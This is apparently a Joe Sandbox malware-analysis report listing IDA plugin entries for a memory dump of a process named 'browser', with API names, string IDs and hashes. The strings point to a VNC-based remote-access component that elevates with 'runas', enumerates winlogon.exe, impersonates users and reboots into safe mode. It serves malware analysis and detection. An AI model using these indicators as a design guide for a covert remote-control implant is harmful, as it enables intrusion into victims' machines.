                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: closesocketfreeinet_addrinet_ntoa$Startup_wgetenvconnectgethostbynamehtonssocket
                                                      • String ID: 0123456789.
                                                      • API String ID: 1515065793-2088042752
                                                      • Opcode ID: af07b22a9e71188c15fa9fdd567796de41b23474eb50f39214d76554fd7e1c69
                                                      • Instruction ID: 0dfd8775ef0ab4e075976e6a83e49bbf3db9769e34a31a19000f0a7cede50e8a
                                                      • Opcode Fuzzy Hash: af07b22a9e71188c15fa9fdd567796de41b23474eb50f39214d76554fd7e1c69
                                                      • Instruction Fuzzy Hash: C2418672A3468186EB34AF3198442FDA2A1FF49BA9F844231DE1D477D9EE3CF5449320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$InitializeLeave$EnterExceptionRaisemalloc
                                                      • String ID: P$vncclient.cpp : init update thread
                                                      • API String ID: 1414418286-2218817233
                                                      • Opcode ID: ddfed08e363cca9923913227180b1ae3d8e90c93c992078c94d7733d39bccdf3
                                                      • Instruction ID: b681db79c4da9f808a6239ebd805cdd4d7ef679671b4c22c022298ce3cf2c71d
                                                      • Opcode Fuzzy Hash: ddfed08e363cca9923913227180b1ae3d8e90c93c992078c94d7733d39bccdf3
                                                      • Instruction Fuzzy Hash: 09414832629B8186E664AF71E4503A9B3A0FF49B90F845135DB9E43B94DF3CF4A48311
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$CloseDeleteEnterFileHandleLeave
                                                      • String ID: !UVNCDIR-$f
                                                      • API String ID: 753559762-4271271459
                                                      • Opcode ID: ec94c065237d398f8d62b421f4d082ca1b1a587006caf467a8040e51e14df5ee
                                                      • Instruction ID: a0ef437d14a570a06c1dea8193ede5f85b273b3cc6cc7457e2bd4b89b399845e
                                                      • Opcode Fuzzy Hash: ec94c065237d398f8d62b421f4d082ca1b1a587006caf467a8040e51e14df5ee
                                                      • Instruction Fuzzy Hash: 07419A21628A8181EB60AF34D4543B9A7A1EF85B64F441335DA6D4B7D5DF3CF444C721
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: freeinet_addrmalloc
                                                      • String ID: 0123456789.$both$local$remote
                                                      • API String ID: 2387382576-3366603569
                                                      • Opcode ID: c0e91ff71c9c1b6fadc6fcdf247a3b57fa66267f63b9c525a4ac725aaf56df2e
                                                      • Instruction ID: 97c3ba4976bb42aaa7e934b4553bc789dba396fdb2c1c7c6089f96b9629859f0
                                                      • Opcode Fuzzy Hash: c0e91ff71c9c1b6fadc6fcdf247a3b57fa66267f63b9c525a4ac725aaf56df2e
                                                      • Instruction Fuzzy Hash: 2421D621A2C68141F774BB31A9003F8A7A1EF897D0FD89131DA1D0B7D5EE2DF9918320
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __doserrno_errno
                                                      • String ID:
                                                      • API String ID: 921712934-0
                                                      • Opcode ID: 32eb1db604c35a1bd73017e45f5c353669c4e319d3a98b1b574dd58bb646ad4a
                                                      • Instruction ID: 79a31dd545b56cd5a98a827dcf25a0fcc6e29a0c73c8d35f1cdd21edc7e91c98
                                                      • Opcode Fuzzy Hash: 32eb1db604c35a1bd73017e45f5c353669c4e319d3a98b1b574dd58bb646ad4a
                                                      • Instruction Fuzzy Hash: 88219D22A3860245F6357A7598512BDA5556F827A1F894535EA1C073D2CE7CFC42EB30
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExecuteFileModuleNameShellfclose
                                                      • String ID: \uvnckeyboardhelper.exe$p$runas
                                                      • API String ID: 3322125093-2954907143
                                                      • Opcode ID: 037d2c38e5ac395d24b8413dad22403111c8ed725fed3ca7cb3e142dbe59519c
                                                      • Instruction ID: 088c9c4962c17cfe167c8d6313a1a6333c9259d9a896817d592559973fc2d18f
                                                      • Opcode Fuzzy Hash: 037d2c38e5ac395d24b8413dad22403111c8ed725fed3ca7cb3e142dbe59519c
                                                      • Instruction Fuzzy Hash: 63310932A18B8285EB74EB30F4513AAB3A5FB89750F805236DA9D43B95DF3CE114CB10
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __doserrno_close_nolock_errno
                                                      • String ID:
                                                      • API String ID: 186997739-0
                                                      • Opcode ID: 0c6e4c21da35182ad9278105eade7e0fa1460cea4b5bf11609be99456b1b247b
                                                      • Instruction ID: 27bf5ab91a2d5a9003def9e44dcc5cdda15a6be09fef9ad6332b744b8e67fde8
                                                      • Opcode Fuzzy Hash: 0c6e4c21da35182ad9278105eade7e0fa1460cea4b5bf11609be99456b1b247b
                                                      • Instruction Fuzzy Hash: 2011AC22E2824285F2253BB5A8412BDA650AF827A1F995634E51D073D2CE6CFC419734
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Timer$KillMessageModePostQuitWindow
                                                      • String ID: d
                                                      • API String ID: 3664928928-2564639436
                                                      • Opcode ID: 118553bd85ce4610845fc2bc57698abad58593aa61c72bc6e801eda45dbd9551
                                                      • Instruction ID: 021eeb168e2ed772aa273afc4da6ed22b18abbfd520b7088ccdddffed3f4c3fe
                                                      • Opcode Fuzzy Hash: 118553bd85ce4610845fc2bc57698abad58593aa61c72bc6e801eda45dbd9551
                                                      • Instruction Fuzzy Hash: 9E1151A2E3860383F7706B35A8156B5A2F0AF45365FC45230C91E867E0DE3CF995DA25
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Window$Long$DialogForegroundItemText
                                                      • String ID: Oct 1 2014 21:43:49
                                                      • API String ID: 2747855613-2751236551
                                                      • Opcode ID: 9a61f633431cb37e218c1f842c908c6751c059a7ba695ef3b628182b3906ce08
                                                      • Instruction ID: f43ea6175e014f2e85223ae08669665dee4c11edca4f07c82a9387753c3da6c7
                                                      • Opcode Fuzzy Hash: 9a61f633431cb37e218c1f842c908c6751c059a7ba695ef3b628182b3906ce08
                                                      • Instruction Fuzzy Hash: 72114F31A28B4285E234AB36A5841B9F2B2FB85BD0F944135DA8A07B94CE3CE4418750
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: SHGetSettings$shell32.dll
                                                      • API String ID: 145871493-1819508790
                                                      • Opcode ID: 77214687e6c2f938150f522afdd75d8ba5a5dca8d0fd701ab14ac9b329bd435a
                                                      • Instruction ID: 24b3ec51cb95695a02dce2986b41190b81bed139cfdcf741fa061d9c15bb42d0
                                                      • Opcode Fuzzy Hash: 77214687e6c2f938150f522afdd75d8ba5a5dca8d0fd701ab14ac9b329bd435a
                                                      • Instruction Fuzzy Hash: 07118C22B3D64282EE64EB75B4841BA93A0EF89B80FC82035DA5E43755DE2DF491C720
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AsyncState$Virtual
                                                      • String ID: down$vnckeymap.cpp : new state %d (%s)$vnckeymap.cpp : setshiftstate %d - (%s->%s)
                                                      • API String ID: 2891131044-1915745809
                                                      • Opcode ID: af929e24d0095cd63bb2d8a54ee9630447cb1a074a3e2900237919080e080432
                                                      • Instruction ID: ec050eaf20b71e293dbfad2253a6336b50b7f9dfb691e8f6dff4344f21d5c9a8
                                                      • Opcode Fuzzy Hash: af929e24d0095cd63bb2d8a54ee9630447cb1a074a3e2900237919080e080432
                                                      • Instruction Fuzzy Hash: 4B11B222B38A53C2E620AF31B4001AAF765FB85755F882435E98E47755DF3CE515C7A0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                      • String ID: winlogon.exe
                                                      • API String ID: 1789362936-961692650
                                                      • Opcode ID: c88a6ee81a24712a405af00b899bfba8e059bc7f51f311d566bee420794a0777
                                                      • Instruction ID: 822eb15ab87a32c130a69adc5e6d9da1287bccac3e529079bc068311dacfbb74
                                                      • Opcode Fuzzy Hash: c88a6ee81a24712a405af00b899bfba8e059bc7f51f311d566bee420794a0777
                                                      • Instruction Fuzzy Hash: 96113D31628A8685EB34AB35F8143AAB3B5FF89794F845230D99E46394DF3CF505CA10
                                                      APIs
                                                      Strings
                                                      • vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - Impersonationtoken exists, xrefs: 00007FF790C5C557
                                                      • vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - 1, xrefs: 00007FF790C5C515
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeaveRevertSelfTimetime
                                                      • String ID: vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - 1$vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - Impersonationtoken exists
                                                      • API String ID: 4293870407-1873781047
                                                      • Opcode ID: be91d13ce7b9590cac12ce48197b4f720c3c90b62c69517ca8b832bb9a46fa5f
                                                      • Instruction ID: d9b01c55a6ddd52703b17b0119a02e8077bec70733a90656e3ed48251578b52c
                                                      • Opcode Fuzzy Hash: be91d13ce7b9590cac12ce48197b4f720c3c90b62c69517ca8b832bb9a46fa5f
                                                      • Instruction Fuzzy Hash: 88119E51A3C58245FB24AB7494883B8A7A1FF45784FD81031D64D06391DF3CF095C760
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                      • String ID: -rebootsafemode$p$runas
                                                      • API String ID: 3648085421-4291177908
                                                      • Opcode ID: ebe23701378919e1af33a6bf656780ce82059cac4ad0fb8edc734de712cd212d
                                                      • Instruction ID: 7f6eee00db50be5f31e925a5763c63d4eb11d0a571cf5de0334e7b87ee5d2f4d
                                                      • Opcode Fuzzy Hash: ebe23701378919e1af33a6bf656780ce82059cac4ad0fb8edc734de712cd212d
                                                      • Instruction Fuzzy Hash: 62019532629B8185E6219B30F49439AB3B4FB89744F801135E68D02764DF7CE158CB10
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
